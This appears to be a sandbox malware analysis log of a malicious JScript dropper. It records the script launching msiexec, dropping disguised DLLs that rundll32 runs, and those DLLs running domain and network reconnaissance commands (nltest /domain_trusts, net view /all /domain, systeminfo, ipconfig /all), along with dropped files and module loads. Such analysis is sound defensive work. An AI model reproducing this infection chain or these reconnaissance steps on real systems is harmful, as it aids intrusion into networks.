Source: rundll32.exe, rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr	Binary or memory string: update sqlite_sequence set seq = 0 where name='MT';

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document_a19_79b555791-28h97348k5477-3219g9.js"
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: unknown	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3F033F6E254CA40A6D9A0D485CFEA9D1	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI3B6A.tmp "C:\Windows\Installer\MSI3B6A.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll", homq	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptnet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI3B6A.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: MSI39EE.tmp.2.dr, MSI3A7C.tmp.2.dr, MSI3AAC.tmp.2.dr, MSIAA9D.tmp.2.dr, MSI3A4C.tmp.2.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI3B6A.tmp, 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSI3B6A.tmp, 00000004.00000000.2129752673.0000000000737000.00000002.00000001.01000000.00000006.sdmp, MSIAA9D.tmp.2.dr, MSI3AEC.tmp.2.dr, MSI3B6A.tmp.2.dr
Source:	Binary string: C:\vmagent_new\bin\joblist\574019\out\Release\360Util64.pdb source: rundll32.exe, 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmp, rundll32.exe, 00000006.00000003.2137135973.00000187EE3D0000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3336141785.0000000180086000.00000002.00000001.01000000.00000009.sdmp, 360total.dll.2.dr, Update_3b24da5a.dll.6.dr

Data Obfuscation

JScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: WScript.Echo("failed: " + e.message); }}installFromURL();}

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_00000001800033E0 memset,memset,memset,memset,CreateFileW,GetFileInformationByHandle,ReadFile,ReadFile,CoTaskMemAlloc,ReadFile,CoTaskMemFree,SetFilePointer,ReadFile,SetFilePointer,ReadFile,SetFilePointer,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,??_U@YAPEAX_K@Z,ReadFile,PathRemoveFileSpecW,PathCombineW,PathRemoveFileSpecW,PathCombineW,free,??_U@YAPEAX_K@Z,ReadFile,ReadFile,SetFilePointer,ReadFile,ReadFile,ReadFile,ILFree,ReadFile,memset,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,CoTaskMemFree,GetLastError,FreeLibrary,CloseHandle,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,SetLastError,

6_2_00000001800033E0

Source: Update_3b24da5a.dll.6.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c
Source: 360total.dll.2.dr	Static PE information: real checksum: 0xe14a2 should be: 0xe5e2c

Source: 360total.dll.2.dr	Static PE information: section name: yhDm^
Source: Update_3b24da5a.dll.6.dr	Static PE information: section name: yhDm^

Source: C:\Windows\Installer\MSI3B6A.tmp	Code function: 4_2_0071323C push ecx; ret	4_2_0071324F
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_0000000180010451 push rcx; ret	6_2_0000000180010452
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018001045A push rcx; ret	6_2_000000018001045B
Source: C:\Windows\System32\rundll32.exe	Code function: 6_2_000000018017500F push rdx; iretd	6_2_0000000180175010

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI3B6A.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Source: C:\Windows\System32\rundll32.exe	File created: :wtfbbq (copy)	Jump to dropped file
Source: C:\Windows\System32\rundll32.exe	File created: C:\Users\user\AppData\Roaming\Custom_update\Update_3b24da5a.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\sharepoint\360total.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3AAC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3B6A.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A4C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI3A7C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI39EE.tmp	Jump to dropped file

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180049AEC OpenSCManagerW,OpenServiceW,ChangeServiceConfigW,StartServiceW,GetTickCount,Sleep,GetTickCount,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,

6_2_0000000180049AEC

Source: C:\Windows\System32\rundll32.exe

Code function: 6_2_0000000180062148 memset,GetModuleFileNameW,PathCombineW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

6_2_0000000180062148

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
